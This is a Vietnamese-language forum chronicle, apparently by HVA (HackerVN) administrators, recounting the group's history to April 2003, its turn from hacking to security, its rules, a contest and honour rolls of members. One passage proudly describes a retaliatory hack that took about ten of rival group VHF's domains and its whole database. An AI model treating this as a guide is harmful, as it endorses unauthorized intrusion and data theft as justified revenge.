Trong lần trở lại này, HVA đã mang bên mình một phong cách mới, một đội ngũ lãnh đạo mới, một dàn “cầu thủ” mới, những luật lệ, nội quy có nhiều mới mẻ và thực sự nghiêm túc. Rút kinh nghiệm từ những sai lầm khi không được định hướng hoạt động ở forum cũ, định hướng mới của của forum đã nhanh chóng được thiết lập: “Phổ biến, nâng cao kiến thức về bảo mật CNTT cho mọi người, và đồng thời với việc khắc phục những hậu quả, sai trái mà HackerVN (cũ) đã gây ra”! Song song đó, BQT mới của HVA đã thiết lập và thi hành nhiều luật lệ rất nghiêm túc như: khi xâm nhập một website hay một hệ thống mạng nào đó thì không được sửa đổi (deface); xóa (delete) nội dung, dữ liệu; tìm được lỗ hổng bảo mật (security holes) nào thì không thông báo công khai mà phải báo cho webmaster, và nếu có thể thì giúp họ sửa lỗi (fix) .v.v.. Rồi những “chiến tích” một thời vang bóng như: sex, account chùa, và mới đây là credit chùa .v.v.. đều liệt vào “sách cấm”. Đó không chỉ là nội quy trên giấy mà đã được BQT thực hiện rất nghiêm túc, tính pháp chế đã được thiết lập và thi hành rất chặt chẽ trên toàn diễn đàn. Điều đó thể hiện quyết tâm của BQT và toàn thể members nhằm xây dựng một HVA đổi mới, vì quyền lợi của mọi người, và vì sự phồn vinh của CNTT Việt Nam.

Nhờ những quyết tâm đó, hoạt động của HVA đã khởi sắc lên hẳn, các thành viên cũ đã dần dần tìm lại với mái ấm năm nào, các thành viên mới bước đầu cũng tham gia khá nhiều. Đội ngũ BQT forum bổ sung thêm nhiều anh tài tuấn kiệt như: Zerone, UFO, Beowulf, Mixter, và nhiều những nhân vật “sừng sỏ” khác như: heineken, nbthanh, mirro, luke .v.v.. Đội ngũ super/moderator/elite cũng được bổ sung thêm nhiều “cao nhân” mới, rất tài năng, đa dạng trong phong cách, tất cả họ đều nhiệt huyết với hoạt động của diễn đàn. Cũng không thể không kể đến nhiều “ẩn sĩ”, nhiều members khác đã cống hiến sức lực cho diễn đàn mà chúng tôi không thể kể hết tên tuổi, sự đóng góp lớn lao của họ vì tương lai tươi sáng của HVA thân yêu.

Song song với việc soạn ra điều lệ, BQT quyết định chuyển qua sử dụng code IkonBoard thay cho code forum cũ. Giao diện forum mới được cải tiến khá bắt mắt, được sửa đổi, chỉnh trang, “mông má” thêm nhiều tính năng quản lý mạnh, bảo mật cao hơn rất nhiều so với các forum cũ. Thời kỳ này cũng chứng kiến một số cải tiến mạnh mẽ về mặt nội dung trên toàn diễn đàn như chuyển các diễn đàn con về “Phần Cứng” sang cho VNOCzone.com, chuyển phần “Đồ Họa” sang Apmexus.com .v.v.. Tất cả nhằm để HVA đi sâu hơn vào chức năng chính hacking and security mà không làm nội dung toàn phần bị loãng! Một số diễn đàn hiện tại cũng được kịp thời bổ sung thêm room con, hoặc thành lập mới hoàn toàn. Nổi bật nhất trong số đó phải kể đến diễn đàn “Security Check Request” – đây được đánh giá là nổ lực lớn của HVA nhằm định hướng hoạt động của toàn diễn đàn sang lĩnh vực security. HVA không chỉ muốn độc lập, tự chủ cho riêng mình mà còn muốn tiến sang hỗ trợ công tác bảo mật cho các hệ thống, các mạng lưới trong nước. Việc forum mới – security check – ra đời cũng chính nhằm đáp ứng một phần những yêu cầu bức bách đó. Đây là chính sách hết sức phù hợp, hết sức cần thiết vì hiện công tác bảo mật ở hiện Việt Nam còn chưa được quan tâm cũng như còn quá nhiều những bất cập chưa thể giải quyết một sớm một chiều được. Hướng đi của HVA chính là khắc phục sự bất cập đó ngõ hầu giúp nâng cao khả năng bảo mật cho mọi người...

Cũng trong mục đích cải tiến các nội dung, HVA Portal (trang tin tức HVA) được thành lập. Đây là nơi dùng để lưu trữ các bài viết hay, các bài dịch tốt để tiện cho người sử dụng download. Một bộ phận khác nữa của HVA được thành lập là HVA.TinVit. Chúng tôi đoan chắc là các bạn rành về cái www.TinVit.net này còn hơn cả chính bản thân chúng tôi nữa nên không cần giới thiệu thêm về nó. smilie

Giai đoạn này cũng xảy ra một sự kiện đáng chú ý trong làng hacker Việt Nam. Đó là “Đại hội hacker Việt Nam” - tổ chức tại Hà Nội, ngày 1/11/2002, do VHF đứng ra tổ chức. Vì nhiều lý do, nhất là do sự bất cập, tính “xôi thịt” của ban tổ chức nên HVA đã tẩy chay không tham dự. Các thành viên HVA nếu có mặt ở đó thì chỉ là với tư cách cá nhân, còn bản thân HVA hoàn toàn không có dính dáng gì đến sự kiện này cả.

Một vấn đề mà các bạn cũng hết sức quan tâm đó là các cuộc “chiến tranh” của HVA. Kể từ giai đoạn này, bảo mật của HVA đã vươn tới đỉnh cao nhất trên “toàn cõi” hệ thống mạng Việt Nam. HVA không còn tình trạng “dời nhà” hay bị “đột nhập” nữa, dù thực tế không ngày nào là không bị tấn công, tình trạng DoS, flood,… hầu như xảy ra liên miên không dứt. Lần duy nhất HVA “bị hack” là khi domain hackervn.net bị VHF lấy mất do sự tiếp tay hết sức phi pháp của một tổ chức internet trong nước và sự bất cẩn không đáng có của cơ quan quản lý domain HVA, dù trước đó HVA đã nhiều lần cảnh báo với họ về những lỗ hổng nguy hiểm trên hệ thống của họ. VHF đã lợi dụng việc chiếm đoạt được domain này để ra các tuyên cáo hết sức sai sự thật như: việc hợp nhất của HVA và VHF; VHF đã hack được HVA .v.v.. Trong khi sự thật thì server của HVA lúc này vững vàng hơn bao giờ hết. VHF đã không xâm nhập được vào nên chỉ có thể “đi dạo” lòng vòng ở ngoài rồi tìm cách hack domain (vốn không thuộc quyền quản lý hay nhận được được sự bảo vệ trực tiếp của HVA) rồi rêu rao những thông tin hết sức sai lệch không xứng với tư cách, với những gì mà họ đã hô hào về họ. Còn nhớ cũng tại Đại hội 1/11, MicrosoftVN – admin VHF – cũng đã công khai thừa nhận rằng là anh ta không tài nào hack được HVA. Vậy mà. . .

Chúng tôi xin mạn phép mượn lời của cố nhạc sĩ Diệp Minh Tuyền để nói lên bức xúc của HVA trước những hành động gây hấn của VHF:

“Dù rằng đời ta thích hoa hồng,

Kẻ thù buộc ta ôm cây súng”

Vâng, chúng tôi muốn hòa bình, chúng tôi không muốn xảy ra xung đột với VHF hay các tổ chức khác! Nhưng sự đời đâu có được như ý chúng tôi mong muốn! Chúng tôi thích hoa hồng mà họ lại muốn chúng tôi phải ôm . . . khẩu súng để kình chống nhau với họ. Đứng trước tình hình đó, BQT HVA – không còn cách nào khác - quyết định sẽ dùng chính cách mà VHF đã sử dụng để đối phó lại với VHF - tức là sẽ hack để lấy lại domain chứ không tiến hành kiện cáo gì cả! Và kết quả như thế nào thì các bạn cũng đã rõ - chúng ta đã thành công! Không những thế chúng ta còn dạy cho VHF một bài học - bài học “đối nhân xử thế”, bài học làm người… - bằng cách hack lấy toàn bộ khoảng chục domain của họ, đồng thời chiếm lấy toàn bộ database .v.v.. khiến cho VHF không biết đến bao giờ mới ngóc đầu lên được. Đây là một kết cục hết sức phù hợp, những kẻ gieo gió thì phải nhận gặt lấy bão thôi. VHF vốn chuyên đi hack các site khác để bổ sung vào bộ sưu tập “thành tích”… phá hoại của họ thì bây giờ họ bị hack lại cũng không có gì là lạ cả. Gieo gió thì gặt bão – đó là quy luật của muôn đời. VHF đã làm những gì thì nay họ phải nhận lấy kết quả đó!...

Thời kỳ Đệ ngũ cộng hòa: Quá độ từ hacking sang security! Thời cực thịnh!

Giai đoạn này có thể kể từ những tháng cuối đông 2002, được khơi mào bằng cuộc thi HVA Contest - một sự kiện hết sức nổi bật vì chưa hề có tiền lệ nào xảy ra trước đó trong làng hacking and security Việt Nam cả. Nội dung cuộc thi xoay quanh vấn đề hacking and security cũng như các kiến thức bổ trợ nhằm nâng cao khả năng bảo mật máy tính tốt hơn. Có thể khẳng định vào thời điểm CNTT Việt Nam - cụ thể ở đây là an ninh trong CNTT - đang trên đà hội nhập thế giới thì một cuộc thi nhằm khuấy động, phát triển phong trào tìm hiểu, nghiên cứu cũng như phát hiện, bồi dưỡng thêm nhiều tài năng mới trong lãnh vực hacking và security như thế này là hết sức cần thiết. Bởi HVA contest có thể tạo nên sân chơi lành mạnh, một cơ hội học hỏi, giao lưu cọ sát cho lớp trẻ vốn ham học hỏi, tò mò tìm hiểu lãnh vực mới mẽ và đầy những thách thức như hacking and security này. Hiện cuộc thi vẫn đang được tiếp tục, và chúng tôi hy vọng sự thành công của nó sẽ là một bước khởi sắc mới về hacking and security Việt Nam. . .

Theo nhận xét của nhiều người, giai đoạn này được xem là “cực thịnh” nhất trong lịch sử HVA từ trước tới nay, và nó cũng được cho là đã đạt được tới đỉnh cao của công nghệ bảo mật Việt Nam nói chung. HVA trờ thành tượng đài sừng sững thách thức tất các hacker cực hữu, những hacker mũ đen đang lăm le phá hoạt hoạt động của internet Việt Nam. . .

Nhờ có nhiều chính sách kịp thời và đúng đắn nên số lượng thành viên của HVA đã gia tăng rất nhanh – nhanh chóng vượt qua con số vạn người, tính đến thời điểm giữa tháng 4/2003 thì đã vượt quá con số 18.000 members. Nhưng không chỉ có quân đông thôi mà tướng còn cực kỳ hùng mạnh nữa, BQT đã trình làng thêm hai nhân vật sừng sỏ là “cựu trùm” khoaimi một thời lừng lẫy, và “chuyên gia gỡ rối… kỹ thuật” thesun. Rồi một loạt những super/mod/elite tài năng cũng theo nhau xuất hiện làm cho hoạt động của diễn đàn hết sức sôi nổi, với chất lượng ngày càng cao hơn. Số lượng thành viên trung bình online cùng lúc trên diễn đàn đã đến hàng trăm, và không dừng lại ở đó mà đang tiếp tục gia tăng từng ngày. Thực ra, số lượng online thực còn cao hơn nhiều vì forum tính số lượng thành viên online dựa vào IP chứ không phải vào session như các forum khác, mà IP Việt Nam lại trùng nhau rất nhiều nên bị bỏ sót. Hầu hết các thành viên cao cấp - những “đại cao thủ” của HVA – cũng như nhiều “ẩn sĩ” khác đều đã và đang du học ở nước ngoài, rất nhiều người trong đó đang công tác ở các Học viện, các viện ĐH, các công ty hàng đầu trong nước cũng như các công ty nổi tiếng ngoài nước .v.v.. Đây là nguồn “chất xám” vô cùng lớn mà nếu có những chính sách ưu đãi thích hợp thì chắc chắn rằng sẽ góp phần không nhỏ vào sự phát triển của nền CNTT nước nhà. Khi đến thời đỉểm thích hợp, nếu được phép, chúng tôi sẽ công khai tên tuổi thật của họ, và chúng tôi tin rằng các bạn sẽ phải hết sức ngạc nhiên vì có những nhân vật nổi tiếng mà thường ngày các bạn rất hâm mộ này.

Thời gian tiếp theo, để phát huy những thành công đạt được cũng như tăng cường hiệu quả hoạt động lên cao hơn nữa, HVA cũng đã lập thêm nhiều nhóm chức năng chuyên sâu hơn như: HVA Bug Hunter, HVA Programer, HVA Cracker, HVA Translator .v.v.. Trong đó, việc cho ra đời nhóm HVA bugs Hunter được xem là một bước tiến mới, một bước ngoặc mới trong làng security nước nhà. Nó là một trong những cố gắng của HVA nhằm giúp nâng cao khả năng bảo mật lên một tầm cao mới, bởi trách nhiệm của nhóm này là tìm ra các lỗ hổng mới (trong hệ thống, ứng dụng .v.v..) mà chưa một lần được công bố; xác định, chỉ rõ rõ những điểm có thể bị lợi dụng để khai thác; liên kết, xúc tiến kiểm tra lỗ hổng bảo mật cho các công ty, các ISPs, IPX .v.v.. HVA đã cũng chuyển sang sử dụng forum Invision Board vốn có nhiều tính năng mạnh và bảo mật cao hơn.

Tính đến thời điểm này (04/2003) có thể khẳng định chúng ta đã đạt được những thành công nhất định trong việc “lèo lái” hoạt động của “con tàu” HVA từ thuần túy hacking sang hướng security - trong khi VHF hay các tổ chức hacker cực hữu khác lại đi theo hướng “find and hack” (chiến thuật tìm và diệt). Quan điểm của chúng ta rất là hết sức rõ ràng: “biết hack cũng chính là cách để chống hack”, và rằng không phải hacking, mà chính security mới chính là mục đích thực sự mà chúng ta muốn hướng đến. Với quan điểm đó, mục đích hoạt động của chúng ta là rất rõ: hướng dẫn, cập nhật, phổ biến các kiến thức về hacking and sucrity cho mọi người. Tôn chỉ hoạt động của chúng ta cũng đã chỉ ra những hành vi không được phép làm: không được phép tạo và phát tán virus, cấm phát tán credit card, account “chùa”, cấm delete hay deface các website khác .v.v.. Chúng ta đang trong thời kỳ quá độ để chuyển từ hacking thuần túy trước đây sang security. Những thành công bước đầu này sẽ là tiền đề cho phép chúng ta tiếp tục vươn tới thành một tổ chức security chính thống, hùng mạnh, được sự thừa nhận của cộng đồng, xã hội. Chắc chắc là chúng ta và đàn em tiếp theo sẽ vẫn tiếp tục tự hào mà “khoe” rằng mình cũng là một thành viên của Diễn đàn HackerVN – HVA - http://www.hackerVN.net, . . .

Tổng quát lại chặng đường 5 năm hình thành và phát triển (1999 – 2003), tuy còn nhiều điều chúng ta chưa thực hiện được, hoặc đã thực hiện rất sai lầm như sự kiện sex, account chùa .v.v.. trong giai đoạn đầu thành lập, nhưng chúng ta đã kịp thời nhìn nhận ra - can đảm nhìn nhận - để kịp sửa chữa, khắc phụ những sai lầm đó. Mỗi lần vấp ngã là mỗi lần chúng ta lại lớn mạnh thêm, chính chắn thêm để trong tương lai chúng ta sẽ vẫn tiếp tục phát huy những thành quả mà chúng ta đạt được để cùng hướng tới những mục tiêu mới, những thành công mới vì một nền security bền vững cho nước nhà.

Khi biên soạn biên niên sử HVA - đến mốc thời điểm hiện nay - chúng tôi xin tạm dừng. Và chúng tôi tin rằng biên niên sử HVA trong những thời kỳ tiếp theo sẽ còn có dịp ghi dấu những chiến công, những thành quả mà chúng ta sẽ đạt được trong ngày hôm nay cũng như trong những khoảng thời gian tiếp sau nữa. Những gì chúng ta làm ngày hôm nay sẽ là lịch sử của ngày hôm sau, và các đàn em sẽ tự hào khi viết tiếp những trang sử vẻ vang về những gì mà chúng ta đã làm được, đã thực hiện hiện được. Chúng tôi mong các bạn hãy hiểu điều đó để tất cả chúng ta hãy cùng nhau hợp tác, tiếp tục phấn đấu vì sự trường tồn của HVA, vì một nền secutiy bền vững, vì nền CNTT hùng mạnh của nước nhà, để không chỉ là sánh vai cùng bè bạn khắp năm châu mà còn cần phải vượt lên đi trước cả họ nữa. . .

CÁC ĐỒNG CHÍ ĐÃ CÓ NHIỀU ĐÓNG GÓP CHO SỰ HÌNH THÀNH VÀ PHÁT TRIỂN CỦA HVA QUA CÁC THỜI KỲ

Bảng vàng HVA

Họ là những founder and master - những người đã xây dựng, kiến tạo nên HVA, ủng hộ HVA hêt mình, cả về vật chất cũng như về tinh thần. Có thể xem họ là những “khai quốc công thần” đã mở đầu cho một HVA vinh quang như ngày nay. Gồm các đồng chí:

– 13013

– DarkAngel

– Trungonly

– Thám Tử

– Onin

– JAL

Bảng bạc HVA

Họ là các admins của HVA qua những thời kỳ - những người trong vai trò quản lý đã cống hiến hết sức mình cho sự tồn tại và vươn lên của HVA. Gồm các đồng chí:

– Zerone

– Braveman

– Lthlthp

– UFO

– Triệu Tử Long

– Beowulf

– Khoaimi

– Thesun

Bảng đồng (chì) HVA

Họ là những Super/Moderator đã có nhiều đóng góp vào sự phát triển của HVA qua những thời kỳ. Bao gồm:

– Apomexus

– Nova

– Conal Dole

– th3_w@tch3r

– Zorro

– Bigwind

– Luke

. . .

Xin các bạn hãy nhớ là chúng tôi đang chờ để bổ sung thêm tên các bạn vào các Bảng thành tích này nhé.

Ngoài ra, khi soạn Biên niên sử Hacker Việt Nam và HVA, chúng tôi xin được ngã mũ chào và gởi lời cảm ơn chân thành đến nhiều người như LPTV, KHA (VHF) .v.v... và nhiều nhiều anh em khác, đã góp một phần không nhỏ sức của mình cho sự hình thành và phát triển của giới Hacker Việt Nam chúng ta. Xin cám ơn các bạn! Chúc cho toàn giới chúng ta sẽ trường tồn bền vững! Chúc nền CNTT nước nhà, chúc nền hacking và security luôn phát triển theo kịp với thế giới xung quanh chúng ta.